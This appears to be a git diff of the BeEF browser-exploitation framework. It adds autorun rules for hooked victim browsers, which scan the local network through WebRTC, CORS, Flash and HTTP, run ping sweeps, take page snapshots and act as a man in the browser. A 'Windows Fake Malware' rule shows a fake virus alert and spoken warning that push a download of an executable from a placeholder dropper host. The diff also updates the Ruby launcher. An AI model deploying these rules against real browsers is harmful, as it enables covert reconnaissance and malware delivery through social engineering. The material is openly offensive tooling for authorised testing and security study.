@@ -28,4 +28,4 @@
  "execution_order": [0,1],
  "execution_delay": [0,2000],
  "chain_mode": "sequential"
-}
+}
--- a/arerules/ie_win_htapowershell.json
+++ b/arerules/ie_win_htapowershell.json
@@ -7,7 +7,7 @@
  "os_version": ">= 7",
  "modules": [
    {
-      "name": "fake_notification_ie",
+      "name": "fake_notification",
      "condition": null,
      "options": {
        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
@@ -24,4 +24,4 @@
  "execution_order": [0,1],
  "execution_delay": [0,500],
  "chain_mode": "sequential"
-}
+}
--- a/arerules/lan_cors_scan.json
+++ b/arerules/lan_cors_scan.json
@@ -0,0 +1,28 @@
+{"name": "LAN CORS Scan",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "cross_origin_scanner_cors",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "ipRange":"<<mod_input>>",
+        "ports":"80,8080",
+        "threads":"2",
+        "wait":"2",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/arerules/lan_cors_scan_common.json
+++ b/arerules/lan_cors_scan_common.json
@@ -0,0 +1,23 @@
+{"name": "LAN CORS Scan (Common IPs)",
+  "author": "bcoles",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "cross_origin_scanner_cors",
+      "condition": null,
+      "code": null,
+      "options": {
+        "ipRange":"common",
+        "ports":"80,8080",
+        "threads":"2",
+        "wait":"2",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/ff_tux_webrtc-internalip.json
+++ b/arerules/ff_tux_webrtc-internalip.json
@@ -1,8 +1,8 @@
-{"name": "Get Internal IP (WebRTC)",
-  "author": "antisnatchor",
-  "browser": "FF",
-  "browser_version": ">= 31",
-  "os": "Linux",
+{"name": "LAN Fingerprint",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "get_internal_ip_webrtc",
@@ -12,17 +12,17 @@
    },
    {"name": "internal_network_fingerprinting",
      "condition": "status==1",
-      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
      "options": {
        "ipRange":"<<mod_input>>",
-        "ports":"80",
-        "threads":"5",
-        "wait":"2",
+        "ports":"80,8080",
+        "threads":"3",
+        "wait":"5",
        "timeout":"10"
      }
    }
  ],
-  "execution_order": [0,1],
+  "execution_order": [0, 1],
  "execution_delay": [0, 0],
  "chain_mode": "nested-forward"
-}
+}
--- a/arerules/lan_fingerprint_common.json
+++ b/arerules/lan_fingerprint_common.json
@@ -0,0 +1,23 @@
+{"name": "LAN Fingerprint (Common IPs)",
+  "author": "antisnatchor",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "internal_network_fingerprinting",
+      "condition": null,
+      "code": null,
+      "options": {
+        "ipRange":"common",
+        "ports":"80,8080",
+        "threads":"3",
+        "wait":"5",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/lan_flash_scan.json
+++ b/arerules/lan_flash_scan.json
@@ -0,0 +1,27 @@
+{"name": "LAN Flash Scan",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "cross_origin_scanner_flash",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "ipRange":"<<mod_input>>",
+        "ports":"80,8080",
+        "threads":"2",
+        "timeout":"5"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/arerules/lan_flash_scan_common.json
+++ b/arerules/lan_flash_scan_common.json
@@ -0,0 +1,22 @@
+{"name": "LAN Flash Scan (Common IPs)",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "cross_origin_scanner_flash",
+      "condition": null,
+      "code": null,
+      "options": {
+        "ipRange":"common",
+        "ports":"80,8080",
+        "threads":"2",
+        "timeout":"5"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/lan_http_scan.json
+++ b/arerules/lan_http_scan.json
@@ -0,0 +1,28 @@
+{"name": "LAN HTTP Scan",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "get_http_servers",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "rhosts":"<<mod_input>>",
+        "ports":"80,8080",
+        "threads":"3",
+        "wait":"5",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/arerules/lan_http_scan_common.json
+++ b/arerules/lan_http_scan_common.json
@@ -0,0 +1,23 @@
+{"name": "LAN HTTP Scan (Common IPs)",
+  "author": "bcoles",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_http_servers",
+      "condition": null,
+      "code": null,
+      "options": {
+        "rhosts":"common",
+        "ports":"80,8080",
+        "threads":"3",
+        "wait":"5",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/lan_ping_sweep.json
+++ b/arerules/lan_ping_sweep.json
@@ -0,0 +1,25 @@
+{"name": "LAN Ping Sweep",
+  "author": "bcoles",
+  "browser": "FF",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "ping_sweep",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "rhosts":"<<mod_input>>",
+        "threads":"3"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/arerules/lan_ping_sweep_common.json
+++ b/arerules/lan_ping_sweep_common.json
@@ -0,0 +1,20 @@
+{"name": "LAN Ping Sweep (Common IPs)",
+  "author": "bcoles",
+  "browser": "FF",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "ping_sweep",
+      "condition": null,
+      "code": null,
+      "options": {
+        "rhosts":"common",
+        "threads":"3"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/man_in_the_browser.json
+++ b/arerules/man_in_the_browser.json
@@ -0,0 +1,17 @@
+{"name": "Perform Man-In-The-Browser",
+  "author": "mgeeky",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "man_in_the_browser",
+      "condition": null,
+      "code": null,
+      "options": {}
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/raw_javascript.json
+++ b/arerules/raw_javascript.json
@@ -0,0 +1,19 @@
+{
+  "name": "Raw JavaScript",
+  "author": "wade@bindshell.net",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "raw_javascript",
+      "condition": null,
+      "options": {
+         "cmd": "alert(0xBeEF);"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/record_snapshots.json
+++ b/arerules/record_snapshots.json
@@ -0,0 +1,19 @@
+{"name": "Collects multiple snapshots of the webpage within Same-Origin",
+  "author": "mgeeky",
+  "browser": ["FF", "C", "O", "IE", "S"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "spyder_eye",
+      "condition": null,
+      "options": {
+        "repeat":"10",
+        "delay":"3000"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/win_fake_malware.json
+++ b/arerules/win_fake_malware.json
@@ -0,0 +1,38 @@
+// note: update your dropper URL (dropper.local) in each of the modules below
+{
+  "name": "Windows Fake Malware",
+  "author": "bcoles",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "Windows",
+  "os_version": "ALL",
+  "modules": [
+    {
+      "name": "blockui",
+      "condition": null,
+      "options": {
+        "message": "<img src='data:image/png;base64,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'/><p>This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer before you do any shopping online. <p><a href='http://dropper.local/malware_removal_tool.exe' onclick='$j.unblockUI();'>Microsoft Malware Removal Toolkit</a></p>",
+        "timeout": "9999"
+      }
+    },
+    {
+      "name": "text_to_voice",
+      "condition": null,
+      "options": {
+        "message": "This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer; before you do any shopping online.",
+        "language": "en"
+      }
+    },
+    {
+      "name": "fake_notification_ie",
+      "condition": null,
+      "options": {
+        "url": "http://dropper.local/malware_removal_tool.exe",
+        "notification_text": "SECURITY WARNING: Download the <a href='http://dropper.local/malware_removal_tool.exe' title='Microsoft Malware Removal Toolkit'>Microsoft Malware Removal Toolkit</a> as soon as possible."
+      }
+    }
+  ],
+  "execution_order": [0,1,2],
+  "execution_delay": [0,0,0],
+  "chain_mode": "sequential"
+}
--- a/241
+++ b/241
@@ -1,55 +1,87 @@
 #!/usr/bin/env ruby

 #
-# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

-# stop deprecation warning from being displayed
+#
+# @note stop Fixnum deprecation warning from being displayed
+#
 $VERBOSE = nil

-# @note Version check to ensure BeEF is running Ruby 1.9 >
-if  RUBY_VERSION < '1.9'
-  puts "\n"
-  puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
-  puts "OSX:"
-  puts "See Readme"
-  puts "\n"
-  exit
+#
+# @note Version check to ensure BeEF is running Ruby 2.4+
+#
+if RUBY_VERSION < '2.4'
+  puts
+  puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version 2.4 or later."
+  puts
+  exit 1
 end

-$:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '.'))
-$root_dir = File.expand_path('..', __FILE__)
-
-# @note Prevent some errors on encoding: encoding handling changed (improved) from 1.8.7 to 1.9.1/2.
-if RUBY_VERSION =~ /1.9/
-  Encoding.default_external = Encoding::UTF_8
-  Encoding.default_internal = Encoding::UTF_8
+#
+# @note Platform check to ensure BeEF is not running on Windows
+#
+if RUBY_PLATFORM.downcase.include?('mswin') || RUBY_PLATFORM.downcase.include?('mingw')
+  puts
+  puts "Ruby platform #{RUBY_PLATFORM} is not supported."
+  puts
+  exit 1
 end

-# @note Require core loader's
+#
+# @note set load path, application root directory and user preferences directory
+#
+$root_dir = File.join(File.expand_path(File.dirname(File.realpath(__FILE__))), '.')
+$:.unshift($root_dir)
+$home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
+
+#
+# @note Require core loader
+#
 require 'core/loader'

-# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
+#
+# @note Create ~/.beef/
+#
+begin
+  FileUtils.mkdir_p($home_dir) unless File.directory?($home_dir)
+rescue => e
+  print_error "Could not create '#{$home_dir}': #{e.message}"
+  exit 1
+end
+
+#
+# @note Initialize the Configuration object. Loads a different config.yaml if -c flag was passed.
+#
 if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
  config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
 else
  config = BeEF::Core::Configuration.new("#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
 end

-# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
-require 'core/bootstrap'
+#
+# @note set log level
+#
+BeEF.logger.level = config.get('beef.debug') ? Logger::DEBUG : Logger::WARN

-# @note Loads enabled extensions
-BeEF::Extensions.load
-
-# @note Prints the BeEF ascii art if the -a flag was passed
-if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
-  BeEF::Core::Console::Banners.print_ascii_art
+#
+# @note Check the system language settings for UTF-8 compatibility
+#
+env_lang = ENV['LANG']
+if env_lang !~ /(utf8|utf-8)/i
+  print_warning "Warning: System language $LANG '#{env_lang}' does not appear to be UTF-8 compatible."
+  if env_lang =~ /\A([a-z]+_[a-z]+)\./i
+    country = $1
+    print_more "Try: export LANG=#{country}.utf8"
+  end
 end

+#
 # @note Check if port and WebSocket port need to be updated from command line parameters
+#
 unless BeEF::Core::Console::CommandLine.parse[:port].empty?
  config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port])
 end
@@ -58,98 +90,143 @@ unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
  config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
 end

-# @note Check if interactive was specified from the command line, therefore override the extension to enable
-if BeEF::Core::Console::CommandLine.parse[:interactive] == true
-  config.set('beef.extension.console.shell.enable',true)
+#
+# @note Validate configuration file
+#
+unless BeEF::Core::Configuration.instance.validate
+  exit 1
 end

+#
+# @note Exit on default credentials
+#
+if config.get("beef.credentials.user").eql?('beef') && config.get("beef.credentials.passwd").eql?('beef')
+  print_error "ERROR: Default username and password in use!"
+  print_more "Change the beef.credentials.passwd in config.yaml"
+  exit 1
+end
+
+#
+# @note Validate beef.http.public and beef.http.public_port
+#
+unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
+  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
+  exit 1
+end
+
+unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
+  print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
+  exit 1
+end
+
+#
+# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
+#
+require 'core/bootstrap'
+
+#
+# @note Prints the BeEF ascii art if the -a flag was passed
+#
+if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
+  BeEF::Core::Console::Banners.print_ascii_art
+end
+
+#
 # @note Prints BeEF welcome message
+#
 BeEF::Core::Console::Banners.print_welcome_msg

+#
+# @note Loads enabled extensions
+#
+BeEF::Extensions.load
+
+#
 # @note Loads enabled modules
+#
 BeEF::Modules.load

-# @note Disable reverse dns
+#
+# @note Disable reverse DNS
+#
 Socket.do_not_reverse_lookup = true

-# @note Database setup - use DataMapper::Logger.new($stdout, :debug) for development debugging
-case config.get("beef.database.driver")
-  when "sqlite"
-    DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
-  when "mysql", "postgres"
-    DataMapper.setup(:default,
-                     :adapter => config.get("beef.database.driver"),
-                     :host => config.get("beef.database.db_host"),
-                     :port => config.get("beef.database.db_port"),
-                     :username => config.get("beef.database.db_user"),
-                     :password => config.get("beef.database.db_passwd"),
-                     :database => config.get("beef.database.db_name"),
-                     :encoding => config.get("beef.database.db_encoding")
-    )
-  else
-    print_error 'No default database selected. Please add one in config.yaml'
-end
-
+#
+# @note Database setup
+#
+#
+# @note Load the database
+#
+db_file = config.get('beef.database.file')
 # @note Resets the database if the -x flag was passed
 if BeEF::Core::Console::CommandLine.parse[:resetdb]
  print_info 'Resetting the database for BeEF.'
-  DataMapper.auto_migrate!
-else
-  DataMapper.auto_upgrade!
+  File.delete(db_file) if File.exists?(db_file)
+end
+# Connect to DB
+ActiveRecord::Base.logger = nil
+OTR::ActiveRecord.migrations_paths = [File.join('core', 'main', 'ar-migrations')]
+OTR::ActiveRecord.configure_from_hash!(adapter:'sqlite3', database:db_file)
+# Migrate (if required)
+context = ActiveRecord::Migration.new.migration_context
+if context.needs_migration?
+  ActiveRecord::Migrator.new(:up, context.migrations, context.schema_migration).migrate
 end

+#
 # @note Extensions may take a moment to load, thus we print out a please wait message
+#
 print_info 'BeEF is loading. Wait a few seconds...'

+#
 # @note Execute migration procedure, checks for new modules
+#
 BeEF::Core::Migration.instance.update_db!

+#
 # @note Create HTTP Server and prepare it to run
+#
 http_hook_server = BeEF::Core::Server.instance
 http_hook_server.prepare

+#
 # @note Prints information back to the user before running the server
+#
 BeEF::Core::Console::Banners.print_loaded_extensions
 BeEF::Core::Console::Banners.print_loaded_modules
 BeEF::Core::Console::Banners.print_network_interfaces_count
 BeEF::Core::Console::Banners.print_network_interfaces_routes

-#@note Prints the API key needed to use the RESTful API
+#
+# @note Prints the API key needed to use the RESTful API
+#
 print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"

-#@note Starts the WebSocket server
-if config.get("beef.http.websocket.enable")
-  BeEF::Core::Websocket::Websocket.instance
-  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
-  if config.get("beef.http.websocket.secure")
-    print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
-  end
-end
-
+#
+# @note Load the GeoIP database
+#
+BeEF::Core::GeoIp.instance

+#
 # @note Call the API method 'pre_http_start'
+#
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)

-# Load any ARE (Autorun Rule Engine) rules scanning the <beef_root>/arerules/enabled directory
+#
+# @note Load any ARE (Autorun Rule Engine) rules scanning the <beef_root>/arerules/enabled directory
+#
 BeEF::Core::AutorunEngine::RuleLoader.instance.load_directory

-# @note Start the HTTP Server, we additionally check whether we load the Console Shell or not
-if config.get("beef.extension.console.shell.enable") == true
-  require 'extensions/console/shell'
-  puts ""
-  begin
-    log_dir = File.expand_path(config.get("beef.extension.console.shell.historyfolder"))
-    FileUtils.mkdir_p(log_dir) unless File.directory?(log_dir)
-  rescue => e
-    print_error "Could not create log directory for shell history '#{log_dir}': #{e.message}"
-    exit 1
-  end
-  begin
-    BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
-                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
-  rescue Interrupt
-  end
-else
-  print_info 'BeEF server started (press control+c to stop)'
-  http_hook_server.start
+#
+# @note Start the WebSocket server
+#
+if config.get("beef.http.websocket.enable")
+  BeEF::Core::Websocket::Websocket.instance
+  BeEF::Core::Console::Banners.print_websocket_servers
 end
+
+#
+# @note Start HTTP server
+#
+print_info 'BeEF server started (press control+c to stop)'
+http_hook_server.start
--- a/beef_cert.pem
+++ b/beef_cert.pem
@@ -1,19 +1,24 @@
 -----BEGIN CERTIFICATE-----
-MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
-VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
-BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
-bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
